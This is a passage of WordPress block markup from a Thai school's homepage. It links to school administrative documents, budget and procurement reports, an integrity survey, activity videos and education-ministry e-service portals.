{\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":754,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/560432794_122252459414202781_8219191812793928684_n-1024x726.jpg\" alt=\"\" class=\"wp-image-754\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" 